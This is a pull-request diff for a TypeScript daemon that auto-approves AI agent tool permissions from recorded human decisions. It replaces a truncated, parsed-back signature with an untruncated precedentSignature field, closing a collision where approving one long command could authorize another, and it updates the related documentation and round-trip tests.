### PR TITLE
Phase 5: session precedent — untruncated signature (#990)

### DIFF
--- a/packages/daemon/src/auto-approve/precedent.ts
+++ b/packages/daemon/src/auto-approve/precedent.ts
@@ -156,26 +156,41 @@
  * measurement first — same discipline ADR 0015 imposed on authority grading —
  * not an inline judgment call. None is attempted here.
  *
- * ## Truncation (CRITICAL, found in independent review, 2026-08-02)
+ * ## Truncation (CRITICAL, found in independent review, 2026-08-02; FIXED #990)
  *
- * `Question.text` — this module's ONLY source for a signature — is not the
- * raw command. `HookEventBridge.summarizeToolInput` (`hooks/hook-event-
- * bridge.ts:621` for Bash, `:647` for the generic path/url/description
- * fallback) truncates anything over 120 characters to exactly `117 chars +
- * "..."`. Left unhandled, two DIFFERENT commands sharing their first 117
- * characters collapse to the identical signature, so approving one
- * exact-matches the other — reachable in ordinary use in this very repo,
- * whose paths routinely exceed 120 characters, not just adversarially.
- * `isTruncatedSignature` below detects that shape; `record()` and both
- * match functions refuse it outright, in both directions. A missed
- * precedent (nothing is recorded/matched for a >120-character command) is
- * the safe direction; a false exact-match on a truncated signature is the
- * privilege-escalation direction this whole module exists to prevent.
- * **Precedent does not currently cover any command/path/url/description
- * over 120 characters** — a real, user-visible gap, not a theoretical one.
- * The proper long-term fix is threading the untruncated value through
- * `Question` and `buildPermissionQuestion` itself; that touches the shared
- * protocol type and is out of scope for this store, tracked as #990.
+ * Before #990, `Question.text` was this module's ONLY source for a RECORDED
+ * signature (`parsePermissionQuestionText` parsed it back apart), and it is
+ * not the raw command: `HookEventBridge.summarizeToolInput` truncated
+ * anything over 120 characters to exactly `117 chars + "..."` for display.
+ * Two DIFFERENT commands sharing their first 117 characters collapsed to the
+ * identical signature, so approving one exact-matched the other — reachable
+ * in ordinary use in this very repo, whose paths routinely exceed 120
+ * characters, not just adversarially. `isTruncatedSignature` below detects
+ * that shape; `record()` and both match functions refuse it outright, in
+ * both directions — the interim mitigation (#989): a missed precedent
+ * (nothing recorded/matched for a >120-character command) is the safe
+ * direction, a false exact-match on a truncated signature is the
+ * privilege-escalation direction this whole module exists to prevent, but
+ * the cost was that precedent covered NO command/path/url/description over
+ * 120 characters at all.
+ *
+ * **#990 fixes this at the source.** `Question` now carries a separate
+ * `precedentSignature` field (`@remi/shared`), populated by
+ * `buildPermissionQuestion` from `signatureForOperation(toolName,
+ * tool_input)` — the SAME function the consult side calls, which itself
+ * calls `summarizeToolInput` with `{ forSignature: true }`, the untruncated
+ * form. `text` is still built from the truncated DISPLAY form and is
+ * unchanged for the card/terminal prompt. `handleAnswer`
+ * (`input-events.ts`) now records from `precedentSignature` directly —
+ * never by parsing `text` — so a >120-character command is recorded and
+ * matched at full length, and `isTruncatedSignature` should no longer fire
+ * on this path in ordinary operation. It remains as a defense-in-depth
+ * backstop below (a legacy/synthetic `Question` with no
+ * `precedentSignature`, or a `PrecedentRecord[]` built directly by a test or
+ * a future caller) — see `isTruncatedSignature`'s own doc, and
+ * `handleAnswer`'s FAIL-CLOSED behavior when `precedentSignature` is absent
+ * (it does not fall back to parsing `text`, which would reintroduce exactly
+ * this collision).
  *
  * ### Round 2 (independent review, 2026-08-02): the check was evadable
  *
@@ -195,7 +210,11 @@
  * module's own test suite). See `isTruncatedSignature`'s doc for the full
  * argument, including why the check is also now a floor (`>=120`) rather
  * than an exact match, and why `record()`'s raw-value check — not the match
- * functions' stored-side check — is the authoritative boundary.
+ * functions' stored-side check — is the authoritative boundary. This round's
+ * reasoning is about `isTruncatedSignature` itself and is unaffected by #990
+ * — it still applies wherever that function is still consulted (defense in
+ * depth, and `parsePermissionQuestionText`'s own now-uncalled-in-production
+ * refusal, kept for its test coverage — see that function's doc).
  */
 
 import { summarizeToolInput } from '../hooks/tool-summary.ts';
@@ -395,7 +414,28 @@ function isTruncatedSignature(signature: string): boolean {
  * as to classifying the answer. This INCLUDES a truncated `action` (see
  * `isTruncatedSignature`, and "Truncation" in this module's doc): a
  * truncated value cannot be a precise signature, so it is refused here at
- * the source, before `handleAnswer` ever has something to hand `record()`.
+ * the source.
+ *
+ * ## No production caller as of #990
+ *
+ * `handleAnswer` (`input-events.ts`) used to be this function's one and only
+ * production caller, feeding it `active.text` to reconstruct a signature by
+ * PARSING the truncated display string back apart. #990 replaced that: the
+ * record side now reads `active.precedentSignature` — the untruncated value
+ * `buildPermissionQuestion` already computed once, via the same
+ * `signatureForOperation` the consult side calls — and fails closed (records
+ * nothing) when that field is absent, rather than falling back to this
+ * parser. Falling back here would reintroduce the exact collision #990
+ * fixes, since `text` is still truncated for display.
+ *
+ * Retained rather than deleted: its truncation-refusal behavior is still
+ * exercised by this module's test suite (documenting the #989/#990 incident
+ * history is worth more than the ~150 lines it costs), and it stays a
+ * correct, defensive fallback IF some future `Question` shape ever needs a
+ * signature reconstructed from text with no `precedentSignature` available —
+ * though no code path does that today, and one that reached for this
+ * function instead of fixing `precedentSignature`'s absence would be making
+ * the same mistake #990 just closed.
  */
 export function parsePermissionQuestionText(
   text: string,
@@ -423,36 +463,63 @@ export function parsePermissionQuestionText(
 }
 
 /**
- * Build the signature for an operation being CONSULTED (#976), from the raw
- * `(toolName, toolInput)` the gate has at decision time — before any
- * `Question` exists to parse.
+ * Build the signature for an operation, from the raw `(toolName, toolInput)`.
+ * This is the ONE canonical signature derivation (#990) — used by BOTH the
+ * CONSULT side (the gate, at decision time, before any `Question` exists) and
+ * the RECORD side (`HookEventBridge.buildPermissionQuestion`, which stamps its
+ * result onto `Question.precedentSignature` at question-construction time, for
+ * `handleAnswer` to hand back to `record()` unchanged when the human answers).
+ * The two must produce byte-identical strings for the same operation or an
+ * exact match silently never fires. That failure is invisible: precedent just
+ * never matches, which is indistinguishable from "the user has not approved
+ * this before."
  *
- * This is the mirror of `parsePermissionQuestionText`, which is the RECORD
- * side, and the two must produce byte-identical strings for the same operation
- * or an exact match silently never fires. That failure is invisible: precedent
- * just never matches, which is indistinguishable from "the user has not
- * approved this before."
- *
- * The identity is structural, not careful: both sides bottom out in
- * `summarizeToolInput` (`hooks/tool-summary.ts`), which is why that function
- * was lifted out of `HookEventBridge` in this same change. Record side parses
- * `Allow <tool>: <detail>` off a question BUILT from it; this side composes
- * `<tool>: <detail>` from it directly. A second implementation here is the
- * exact defect shape this module's area has produced repeatedly.
+ * The identity is structural, not careful: both sides call this ONE function
+ * (`buildPermissionQuestion` directly; the gate indirectly through whatever
+ * calls this at consult time), which itself calls `summarizeToolInput`
+ * (`hooks/tool-summary.ts`) with `{ forSignature: true }` — the untruncated
+ * form (#990; before that, the record side instead PARSED the truncated
+ * display text back apart, a second, drift-prone derivation of the same
+ * value — see "Truncation" in this module's doc for that incident). A second
+ * implementation of either half is the exact defect shape this module's area
+ * has produced repeatedly.
  *
  * Returns the bare tool name when there is no summarizable argument, matching
  * `buildPermissionQuestion`'s own `Allow <tool>` shape.
  *
- * No truncation check here: `findApprovedPrecedent` / `findDeniedPrecedent`
- * both refuse a truncated QUERY on the raw value (`isTruncatedSignature`), and
- * doing it in two places invites the two checks to disagree.
+ * No truncation check here: nothing this function produces can BE truncated
+ * (`forSignature: true` guarantees that), and `findApprovedPrecedent` /
+ * `findDeniedPrecedent` both still refuse a truncated QUERY on the raw value
+ * (`isTruncatedSignature`) as defense-in-depth against some other caller
+ * constructing a signature a different way.
  */
 export function signatureForOperation(
   toolName: string,
   toolInput: Record<string, unknown>,
 ): string {
-  const detail = summarizeToolInput(toolName, toolInput);
+  const detail = summarizeToolInput(toolName, toolInput, { forSignature: true });
   return detail === null ? toolName : `${toolName}: ${detail}`;
+}
+
+/**
+ * Recover the tool name `signatureForOperation` embedded in its own output —
+ * the structural inverse of that function's `<tool>: <detail>` / bare
+ * `<tool>` construction. Exists so a caller holding only a
+ * `Question.precedentSignature` string (`handleAnswer`, `input-events.ts` —
+ * `Question` carries no separate tool-name field) can still supply
+ * `PrecedentStore.record`'s required `toolName` without re-deriving it from
+ * the human-facing, truncated `text` — the exact regression #990 exists to
+ * close.
+ *
+ * Safe by construction, not by convention: a Claude Code tool name is always
+ * a plain identifier and never itself contains `': '`, so the first `': '` in
+ * a `signatureForOperation` output is always the boundary that function
+ * inserted, never a colon-space sequence buried inside `detail` that happens
+ * to precede it (`signatureForOperation` puts `toolName` first, always).
+ */
+export function toolNameFromSignature(signature: string): string {
+  const colonIndex = signature.indexOf(': ');
+  return colonIndex === -1 ? signature : signature.slice(0, colonIndex);
 }
 
 /**
@@ -795,8 +862,10 @@ export class PrecedentStore {
 
   /**
    * Record one human-classified answer. `toolName` and `signature` are
-   * expected pre-extracted (e.g. via `parsePermissionQuestionText`) — this
-   * method only normalizes and stores, it does not parse. A blank tool name
+   * expected pre-extracted (as of #990: `toolNameFromSignature` +
+   * `Question.precedentSignature`, both untruncated — see that field's doc)
+   * — this method only normalizes and stores, it does not parse. A blank
+   * tool name
    * or signature (after normalization), OR a truncated signature
    * (`isTruncatedSignature` — see "Truncation" in this module's doc,
    * CRITICAL, found in review), is refused rather than stored: the first is

--- a/packages/daemon/src/auto-approve/precedent.ts
+++ b/packages/daemon/src/auto-approve/precedent.ts
@@ -354,16 +354,38 @@ const TRUNCATION_MARKER = '...';
  * flag it, reopening the truncation-collision vulnerability this function
  * exists to close. A floor keeps catching it. The cost is symmetrical with
  * the heuristic already accepted below (a longer genuine value that happens
- * to end in the marker is also refused) — both failure directions land on
- * "missed precedent," the safe one, never "false match."
+ * to end in the marker is also refused) — both land on "missed precedent,"
+ * never on a "false match" (the direction this function guards). "Missed
+ * precedent" is the safe direction for an APPROVE but weakens the stop rule
+ * for a DENY; see the approve/deny split under the heuristic note below
+ * (#1067).
  *
  * This is a heuristic, not a certainty: a genuine, untruncated value that
  * happens to be at least 120 characters and end in `...` (e.g. a command
  * that legitimately prints `"loading..."`) would also match and be refused.
- * That false positive costs a missed precedent — the safe direction, not
- * the dangerous one — so no attempt is made to distinguish it from a real
- * truncation; the alternative (treating it as untruncated) risks the exact
- * false-match this function exists to prevent.
+ * No attempt is made to distinguish it from a real truncation; the
+ * alternative (treating it as untruncated) risks the exact false-match this
+ * function exists to prevent.
+ *
+ * That false positive is NOT symmetric across the two record decisions, and
+ * the older "missed precedent — the safe direction" framing understated one
+ * half (adversarial review, 2026-08-16). Post-#990 the normal record/consult
+ * path never produces a truly truncated signature, so on that path this
+ * check only ever fires as a false positive; what it costs then depends on
+ * the decision:
+ *   - APPROVE (record or match): the operation is not auto-approved by
+ *     precedent and is simply re-asked. Fail-closed — the safe direction.
+ *   - DENY: a human "no" is not persisted as a stop rule (`record()` drops
+ *     it, and `findDeniedPrecedent` would skip it as a query), so a later
+ *     model `approve` of the identical operation stands instead of being
+ *     escalated back — the deny stop rule is silently weakened, the
+ *     LESS-safe direction. It never manufactures a false approve on its own
+ *     (the model still evaluates), and this is not a #990 regression
+ *     (pre-#990 dropped EVERY >120-char denial; #990 shrinks it to only
+ *     `...`-ending ones) — but it is a real gap, tracked as #1067. The
+ *     record-side refusal is kept unchanged here: removing it for denials
+ *     needs the deny-MATCH side handled too, without reopening the round-2
+ *     substring hole, which is #1067's own delicate change, not this one.
  *
  * ## No `': '` separator: the whole signature is the detail
  *
@@ -678,7 +700,15 @@ export function precedentMayAuthorize(
   // risk layer reads `command` and nothing else — so a `cmd`-only call has an
   // unclassifiable band and must not be authorizable. Requiring the field the
   // BOUND depends on is what keeps the two in agreement.
-  return typeof toolInput['command'] === 'string' && toolInput['command'].length > 0;
+  //
+  // `.trim().length`, not `.length` (adversarial review, 2026-08-16): a
+  // whitespace-only command is an inert no-op whose signature trims to a bare
+  // `Bash:`, so every whitespace-only command would collapse to the same
+  // precedent entry and cross-match. Harmless (nothing executes), but a
+  // precedent nobody can meaningfully act on has no business being eligible.
+  // Gating both the record and consult sides here keeps them in agreement.
+  const command = toolInput['command'];
+  return typeof command === 'string' && command.trim().length > 0;
 }
 
 /**
@@ -878,6 +908,12 @@ export class PrecedentStore {
    * reach `this.records`, so a stored record is never truncated in
    * practice (see `isTruncatedSignature`'s doc on why the match functions'
    * stored-side check is therefore redundant, not the reverse).
+   *
+   * This refusal runs for BOTH decisions, and dropping a `denied` record is
+   * not purely safe the way dropping an `approved` one is: it weakens the
+   * deny stop rule for a genuine, untruncated command that happens to end in
+   * `...` (>=120 chars). See the approve/deny split in `isTruncatedSignature`'s
+   * doc — kept unchanged here, tracked as #1067.
    *
    * The truncation check MUST run on the RAW `signature` parameter, BEFORE
    * `normalizeSignature` touches it (round 2, review 2026-08-02):

--- a/packages/daemon/src/cli/handlers/input-events.ts
+++ b/packages/daemon/src/cli/handlers/input-events.ts
@@ -12,7 +12,7 @@
 import { createBulletExpandResponse, createError, errorToString } from '@remi/shared';
 import type { AnswerExtras, AnswerSelection, Question, QuestionOption, UUID } from '@remi/shared';
 
-import { parsePermissionQuestionText } from '../../auto-approve/precedent.ts';
+import { toolNameFromSignature } from '../../auto-approve/precedent.ts';
 import { clearAuqRunActive, markAuqRunActive } from '../../hooks/auq-active-runs.ts';
 import { AUQ_KEYS } from '../../hooks/auq-answer.ts';
 import { type AuqRunOutcome, runAuqAnswer } from '../../hooks/auq-runner.ts';
@@ -775,22 +775,34 @@ export function createInputHandlers(deps: InputHandlerDeps) {
       //     which both `return` earlier, so those are skipped by
       //     construction, not by an extra check here.
       //   - `active.source === 'permission_request'` restricts to the ONE
-      //     Question shape that carries genuine tool+command text,
+      //     Question shape that carries genuine tool+command identity,
       //     deterministically built by `HookEventBridge.buildPermissionQuestion`
       //     (hook-event-bridge.ts). A `source: 'pty'` / `'notification'` /
       //     `'elicitation'` question, or the source-less StopFailure "Retry?"
       //     prompt, carries no reliable tool/command identity and is skipped
       //     — recording "Retry?" -> yes as an approval of some tool would be
       //     exactly the unrecoverable mistake this module's doc warns about.
-      //   - `parsePermissionQuestionText` can still return null (defensive;
-      //     see its own doc) — skipped rather than guessed.
+      //   - `active.precedentSignature` (#990) is the UNTRUNCATED signature
+      //     `buildPermissionQuestion` computed once, via the same
+      //     `signatureForOperation` the consult side calls -- NOT the
+      //     truncated, human-facing `active.text`. It is present only for a
+      //     precedent-eligible operation (`precedentMayAuthorize`'s
+      //     allowlist); absent for everything else, INCLUDING a legacy/
+      //     synthetic `Question` built before this field existed. Absent =>
+      //     FAIL CLOSED, skip recording entirely. Do NOT fall back to
+      //     parsing `active.text` (the pre-#990 approach,
+      //     `parsePermissionQuestionText`) -- that reintroduces the exact
+      //     collision #990 closes: two different >120-character commands
+      //     sharing their first 117 characters truncate to the identical
+      //     `text`, so recording from it would let approving one silently
+      //     authorize the other.
       if (decision !== null && active.source === 'permission_request') {
-        const parsed = parsePermissionQuestionText(active.text);
-        if (parsed) {
+        const signature = active.precedentSignature;
+        if (signature !== undefined) {
           recordPrecedent?.(
             session.sessionId,
-            parsed.toolName,
-            parsed.signature,
+            toolNameFromSignature(signature),
+            signature,
             decision.decision === 'allow' ? 'approved' : 'denied',
           );
         }

--- a/packages/daemon/src/hooks/hook-event-bridge.ts
+++ b/packages/daemon/src/hooks/hook-event-bridge.ts
@@ -31,6 +31,7 @@
 import { DEFAULT_PERMISSION_LABELS, generateId } from '@remi/shared';
 import type { AgentStatus, Question, QuestionOption, UUID } from '@remi/shared';
 import type { QuestionRegistrationOutcome } from '../api/message-api.ts';
+import { precedentMayAuthorize, signatureForOperation } from '../auto-approve/precedent.ts';
 import type { HookServerEvents } from './hook-server.ts';
 import type {
   ElicitationHookInput,
@@ -506,6 +507,24 @@ export class HookEventBridge {
       // (e.g. "Force-push to main?"). AskUserQuestion carries authored content, so a
       // summary is only threaded for non-AUQ permission escalations.
       ...(summary ? { summary } : {}),
+      // #990: the untruncated, exact-match precedent signature -- see
+      // `precedentSignature`'s own doc on `Question` and `signatureForOperation`
+      // in `precedent.ts`. Set ONLY when `precedentMayAuthorize` would actually
+      // consult a signature for this (toolName, tool_input) -- today, `Bash`
+      // with a `command` field -- so the field's mere presence signals
+      // eligibility rather than leaving every reader to re-run the predicate.
+      // Harmless either way (a signature for an ineligible tool would simply
+      // never be consulted), but mirroring eligibility here keeps "does this
+      // question carry a usable precedent signature" a one-field check. Never
+      // set for a `toolQuestion` (AskUserQuestion/ExitPlanMode): those tool
+      // names are never in the eligible set, so this is always `{}` for them
+      // regardless -- computed unconditionally below rather than duplicated
+      // into both branches above, since the two are mutually exclusive by
+      // construction (`toolQuestion` only matches question-bearing tools,
+      // never `Bash`).
+      ...(precedentMayAuthorize(toolName, input.tool_input)
+        ? { precedentSignature: signatureForOperation(toolName, input.tool_input) }
+        : {}),
     };
   }
 

--- a/packages/daemon/src/hooks/tool-summary.ts
+++ b/packages/daemon/src/hooks/tool-summary.ts
@@ -2,36 +2,67 @@
  * The short, human-readable description of a tool call — `rm -rf ./build` for
  * a Bash command, `/etc/hosts` for a Write, and so on.
  *
+ * ## Two forms, one function (#990)
+ *
+ * `summarizeToolInput` produces two shapes from the exact same extraction
+ * logic, selected by `opts.forSignature`:
+ *
+ *   - DISPLAY (default; `forSignature` absent/false): truncates a long value
+ *     to `SUMMARY_MAX` (120) characters, for a lock-screen card or terminal
+ *     prompt that must stay one bounded line.
+ *   - SIGNATURE (`forSignature: true`): the value verbatim, at any length —
+ *     never truncated. `precedent.ts`'s `signatureForOperation` is the ONLY
+ *     caller that passes this. See its doc, and "Truncation" below, for why an
+ *     exact-match authorization signature must never be the truncated form:
+ *     two DIFFERENT commands sharing their first 117 characters used to
+ *     collapse to one signature, so approving one silently authorized the
+ *     other (#990).
+ *
+ * Only the branches that ever call `truncate` (Bash's `command`/`cmd`, and the
+ * generic last-resort loop) can differ between the two forms, and only in
+ * LENGTH — the extraction logic itself (which field wins, which tool matches
+ * which branch) never forks on `forSignature`. Read/Write/Edit's `file_path`,
+ * Glob/Grep's `pattern`, and the fetch/web `url` were already untruncated at
+ * any length, so `forSignature` changes nothing for them.
+ *
  * ## Why this is its own module (#976)
  *
  * It was a private method on `HookEventBridge`, with exactly one caller:
  * `buildPermissionQuestion`, which folds it into `Question.text` as
  * `Allow <tool>: <detail>`. That was fine while nothing else needed it.
  *
- * Precedent (`auto-approve/precedent.ts`) changed that. Precedent RECORDS from
- * the answered `Question.text` — so its signature is this function's output,
- * reached by parsing — and now needs to CONSULT from a raw
- * `(toolName, toolInput)` at decision time, before any question exists. Those
- * two signatures must be byte-identical or an exact match silently never
- * fires, and the failure is invisible: precedent simply never matches, which
- * looks exactly like "the user has not approved this before."
+ * Precedent (`auto-approve/precedent.ts`) changed that: it needs to CONSULT
+ * from a raw `(toolName, toolInput)` at decision time, before any question
+ * exists, and (as of #990) also needs the RECORD side to derive from the exact
+ * same untruncated call rather than re-deriving anything from `Question.text`.
+ * Both sides now call `signatureForOperation`, which calls this function with
+ * `{ forSignature: true }` — one function, all callers, no drift possible.
+ * (Before #990, the record side reached this function's output by PARSING
+ * `Question.text` — a second, truncated derivation of the same value. That was
+ * the specific defect this module exists to rule out; see precedent.ts's
+ * module doc, "Truncation", for the full incident.)
  *
- * A second implementation on the consult side is the specific defect this
- * module's own area has produced five times over — two pieces of code deriving
- * the same judgement independently and drifting the first time one changes.
- * One function, two callers, no drift possible.
+ * ## Truncation: load-bearing for DISPLAY, no longer for authorization
  *
- * ## Truncation is load-bearing, not cosmetic
+ * The 120-character cap below is unchanged and still exists for DISPLAY. Before
+ * #990, precedent's signature bottomed out in this SAME truncated value, which
+ * made the cap load-bearing for authorization too, in a way its original
+ * author never considered: two DIFFERENT commands sharing their first 117
+ * characters produced the IDENTICAL summary, so approving one would
+ * exact-match the other. `precedent.ts` refused any truncated signature
+ * outright for that reason (`isTruncatedSignature`), calibrated against the
+ * exact shape produced here — 117 kept characters plus a 3-character marker —
+ * but that refusal meant every >120-character command was simply uncovered by
+ * precedent at all (#989's interim mitigation; #990 is the real fix).
  *
- * The 120-character cap exists for the question text, but precedent depends on
- * it in a way the cap's original author never considered: two DIFFERENT
- * commands sharing their first 117 characters produce the IDENTICAL summary,
- * so approving one would exact-match the other. `precedent.ts` refuses any
- * truncated signature outright for that reason (`isTruncatedSignature`), and
- * that refusal is calibrated against the exact shape produced here — 117 kept
- * characters plus a 3-character marker. **Changing either number without
- * updating `TRUNCATED_DETAIL_LENGTH` there reopens a privilege-escalation
- * hole**, not merely a display glitch.
+ * As of #990, `signatureForOperation` calls this function with
+ * `forSignature: true`, so the signature never truncates and `precedent.ts`'s
+ * own truncation refusal should no longer fire on the ordinary record/consult
+ * path — it remains only as a defense-in-depth backstop on the query side (see
+ * `isTruncatedSignature`'s doc there). **Changing `SUMMARY_MAX` /
+ * `TRUNCATED_KEEP` below now only affects DISPLAY text, not authorization** —
+ * the privilege-escalation coupling this doc used to warn about is gone,
+ * because the signature path no longer calls `truncate` at all.
  */
 
 /** Longest summary emitted verbatim. Beyond this the value is truncated to
@@ -44,26 +75,47 @@ function truncate(value: string): string {
   return value.length > SUMMARY_MAX ? `${value.slice(0, TRUNCATED_KEEP)}...` : value;
 }
 
+/** Options for {@link summarizeToolInput}. */
+export interface SummarizeToolInputOptions {
+  /**
+   * `true` for the precedent SIGNATURE form: the value is returned verbatim,
+   * never truncated, regardless of length. `false`/absent (the default) is
+   * the DISPLAY form used for question text — see the module doc, "Two
+   * forms, one function". Only `precedent.ts`'s `signatureForOperation`
+   * should ever pass `true`; every other caller wants the display form.
+   */
+  readonly forSignature?: boolean;
+}
+
 /**
  * Extract a short summary from tool input for the question prompt.
  *
  * Returns `null` when the tool carries no summarizable argument — the caller
  * then uses the bare tool name. Pure and total: never throws, never guesses.
+ *
+ * See the module doc ("Two forms, one function") for `opts.forSignature`.
  */
 export function summarizeToolInput(
   toolName: string,
   toolInput: Record<string, unknown>,
+  opts?: SummarizeToolInputOptions,
 ): string | null {
   if (!toolInput || typeof toolInput !== 'object') return null;
   const lower = toolName.toLowerCase();
+  const forSignature = opts?.forSignature ?? false;
 
   const get = (key: string): unknown => toolInput[key];
+  // DISPLAY truncates to SUMMARY_MAX; SIGNATURE never does. Every branch that
+  // can produce an unbounded-length value routes it through this instead of
+  // calling `truncate` directly, so there is exactly one place the two forms
+  // are allowed to diverge.
+  const cap = (value: string): string => (forSignature ? value : truncate(value));
 
   // Bash: show the command
   if (lower === 'bash' || lower === 'terminal') {
     const cmd = get('command') ?? get('cmd');
     if (typeof cmd === 'string') {
-      return truncate(cmd);
+      return cap(cmd);
     }
   }
 
@@ -89,7 +141,7 @@ export function summarizeToolInput(
   for (const key of ['command', 'file_path', 'path', 'url', 'description']) {
     const val = get(key);
     if (typeof val === 'string' && val.length > 0) {
-      return truncate(val);
+      return cap(val);
     }
   }
 

--- a/packages/daemon/tests/auto-approve/precedent-signature-roundtrip.test.ts
+++ b/packages/daemon/tests/auto-approve/precedent-signature-roundtrip.test.ts
@@ -80,6 +80,15 @@ const OPERATIONS: Array<[string, Record<string, unknown>]> = [
   // (nothing here normalizes), so normalization elsewhere is not papering
   // over a drift.
   ['Bash', { command: 'echo  "two  spaces"' }],
+  // A command whose OWN text contains `': '` -- `git commit -m "fix: bug"`,
+  // `echo "key: value"`, extremely common shapes. The eligible-case assert
+  // below (`toolNameFromSignature(...) === toolName`) pins that the tool name
+  // is recovered from the FIRST `': '` (the `Bash: ` prefix), not a later one
+  // buried in the command. A mutation to `lastIndexOf(': ')` would parse this
+  // to `Bash: git commit -m "fix` and fail here; it silently loses precedent
+  // coverage for every colon-space command otherwise (safe direction — missed
+  // precedent — but invisible, exactly the failure mode this file guards).
+  ['Bash', { command: 'git commit -m "fix: bug"' }],
 ];
 
 describe('#990 Question.precedentSignature agrees byte-for-byte with the consult side', () => {

--- a/packages/daemon/tests/auto-approve/precedent-signature-roundtrip.test.ts
+++ b/packages/daemon/tests/auto-approve/precedent-signature-roundtrip.test.ts
@@ -1,29 +1,36 @@
 /**
- * #976: the RECORD side and the CONSULT side must derive the same signature.
+ * #976 / #990: the RECORD side and the CONSULT side must derive the same
+ * signature, and it must never be truncated.
  *
- * This is the one property the precedent widening rests on, and its failure
- * mode is invisible. Precedent records from an answered `Question.text`
- * (parsed by `parsePermissionQuestionText`) and consults from a raw
- * `(toolName, toolInput)` at decision time (`signatureForOperation`). If those
- * two ever produce different strings for the same operation, `matchApproved`
- * — an EXACT match by design — silently never fires. Nothing errors, nothing
- * logs; precedent just stops working, which looks exactly like "the user has
- * not approved this before."
+ * Precedent consults from a raw `(toolName, toolInput)` at decision time
+ * (`signatureForOperation`). Before #990, it RECORDED by parsing the answered
+ * `Question.text` back apart -- a second, truncated derivation of the same
+ * value, and the source of the #990 collision (two different >120-character
+ * Bash commands sharing their first 117 characters truncated to the identical
+ * `text`, so approving one silently authorized the other).
  *
- * So this file does not test the two functions separately. It runs the REAL
+ * #990 replaced that: `Question.precedentSignature` is now computed ONCE, by
+ * `buildPermissionQuestion`, by calling the exact same `signatureForOperation`
+ * the consult side calls -- so record and consult are byte-identical BY
+ * CONSTRUCTION, not by care, and never truncated. `Question.text` keeps
+ * truncating for display; it is no longer precedent's concern.
+ *
+ * This file does not test the functions in isolation. It runs the REAL
  * `HookEventBridge.buildPermissionQuestion` to produce the question a user
- * would actually answer, parses it with the real record-side parser, and
- * compares against the real consult-side builder. No literal expected strings:
- * a hardcoded `'Bash: git push'` would keep passing if BOTH sides changed
- * together, which is the case that matters least, and would fail spuriously on
- * a cosmetic question-text change, which is the case that matters not at all.
+ * would actually answer, and compares its `precedentSignature` against the
+ * real consult-side builder. No literal expected strings: a hardcoded
+ * `'Bash: git push'` would keep passing if BOTH sides changed together, which
+ * is the case that matters least, and would fail spuriously on a cosmetic
+ * question-text change, which is the case that matters not at all.
  */
 
 import { describe, expect, test } from 'bun:test';
 import type { Question, UUID } from '@remi/shared';
 import {
   parsePermissionQuestionText,
+  precedentMayAuthorize,
   signatureForOperation,
+  toolNameFromSignature,
 } from '../../src/auto-approve/precedent.ts';
 import { HookEventBridge } from '../../src/hooks/hook-event-bridge.ts';
 import type { PermissionRequestHookInput } from '../../src/hooks/index.ts';
@@ -53,7 +60,10 @@ function permissionRequest(
 }
 
 /** Every tool shape `summarizeToolInput` branches on, plus the no-argument
- *  case. Each is a real operation, not a synthetic string. */
+ *  case. Each is a real operation, not a synthetic string. Only `Bash` (with
+ *  a `command` field) is precedent-eligible (`precedentMayAuthorize`); the
+ *  rest are included specifically to pin that they do NOT get a
+ *  `precedentSignature` -- see the "eligibility" describe block below. */
 const OPERATIONS: Array<[string, Record<string, unknown>]> = [
   ['Bash', { command: 'git push origin feature/x' }],
   ['Bash', { command: 'rm -rf ./build && bun run build' }],
@@ -66,68 +76,114 @@ const OPERATIONS: Array<[string, Record<string, unknown>]> = [
   ['WebFetch', { url: 'https://example.com/a' }],
   ['SomeMcpTool', { description: 'do the thing' }],
   ['ToolWithNoSummarizableArgument', { unknown_field: 1 }],
-  // Whitespace inside the command: the record side normalizes on store, the
-  // consult side does not -- the matchers normalize both. This pins that the
-  // RAW strings still agree, so normalization is not papering over a drift.
+  // Whitespace inside the command: pins that the RAW strings still agree
+  // (nothing here normalizes), so normalization elsewhere is not papering
+  // over a drift.
   ['Bash', { command: 'echo  "two  spaces"' }],
 ];
 
-describe('#976 record-side and consult-side signatures agree', () => {
+describe('#990 Question.precedentSignature agrees byte-for-byte with the consult side', () => {
   for (const [toolName, toolInput] of OPERATIONS) {
-    test(`${toolName}: ${JSON.stringify(toolInput).slice(0, 50)}`, () => {
+    const eligible = precedentMayAuthorize(toolName, toolInput);
+    test(`${toolName}: ${JSON.stringify(toolInput).slice(0, 50)} (eligible=${eligible})`, () => {
       const question: Question = bridge().buildPermissionQuestion(
         permissionRequest(toolName, toolInput),
       );
-      const recorded = parsePermissionQuestionText(question.text);
-      expect(recorded).not.toBeNull();
-      expect(recorded?.toolName).toBe(toolName);
-      // The whole point: the string the user's ANSWER would store equals the
-      // string a later evaluation would look up.
-      expect(recorded?.signature).toBe(signatureForOperation(toolName, toolInput));
+      const derived = signatureForOperation(toolName, toolInput);
+
+      if (eligible) {
+        // The whole point: the string the user's ANSWER would record equals
+        // the string a later evaluation would look up -- computed by the
+        // SAME function, not independently re-derived.
+        expect(question.precedentSignature).toBe(derived);
+        expect(toolNameFromSignature(question.precedentSignature as string)).toBe(toolName);
+      } else {
+        // Not precedent-eligible: no signature is attached at all, mirroring
+        // `precedentMayAuthorize`'s own allowlist rather than leaving a
+        // signature nobody will ever consult sitting on the Question.
+        expect(question.precedentSignature).toBeUndefined();
+      }
     });
   }
 
-  test('a SUBAGENT question round-trips to the same signature as the main agent', () => {
-    // The agent prefix (`reviewer · Bash: ...`) is display, not identity. If
-    // the parser left it in, a subagent's answer would never authorize the
-    // main agent's identical operation and vice versa.
+  test('a SUBAGENT question carries the same precedentSignature as the main agent', () => {
+    // The agent prefix (`reviewer · Bash: ...`) is display-only, folded into
+    // `text`. `precedentSignature` is built directly from (toolName,
+    // toolInput), never from text, so it must be identical regardless of
+    // agent context -- otherwise a subagent's answer could never authorize
+    // the main agent's identical operation and vice versa.
     const input = { command: 'git push origin feature/x' };
+    const asMain = bridge().buildPermissionQuestion(permissionRequest('Bash', input));
     const asSubagent = bridge().buildPermissionQuestion(
       permissionRequest('Bash', input, 'code-reviewer'),
     );
     expect(asSubagent.text).toContain('code-reviewer · ');
-    expect(parsePermissionQuestionText(asSubagent.text)?.signature).toBe(
-      signatureForOperation('Bash', input),
+    expect(asSubagent.precedentSignature).toBe(asMain.precedentSignature as string);
+    expect(asSubagent.precedentSignature).toBe(signatureForOperation('Bash', input));
+  });
+
+  test('a question-bearing tool (AskUserQuestion) never gets a precedentSignature', () => {
+    const question = bridge().buildPermissionQuestion(
+      permissionRequest('AskUserQuestion', {
+        questions: [
+          {
+            question: 'Which approach?',
+            header: 'Approach',
+            multiSelect: false,
